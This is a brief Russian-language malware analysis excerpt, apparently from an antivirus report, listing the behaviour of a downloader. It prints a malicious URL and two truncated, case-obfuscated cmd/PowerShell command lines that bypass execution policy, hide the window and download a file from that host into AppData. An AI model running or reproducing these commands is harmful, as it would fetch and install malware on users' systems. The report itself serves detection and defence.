Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gf как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoWeRsHell.exE -exeCuTIoNpOlICY BYpaSs -NOprofIlE -wNdoWsTyLE Hdden (NEW-oBjECT sYstem.neT.weBCLIEnT).dOWnLoADFILE('http://www.zonedopesa.top/read.php?f=1.gf','%aPpdaTA%...
- '<SYSTEM32>\cmd.exe' /c "PoWeRsHell.exE -exeCuTIoNpOlICY BYpaSs -NOprofIlE -wNdoWsTyLE Hdden (NEW-oBjECT sYstem.neT.weBCLIEnT).dOWnLoADFILE('http://www.zonedopesa.top/read.php?f=1.gf','%aPpdaTA%...' (со скрытым окном)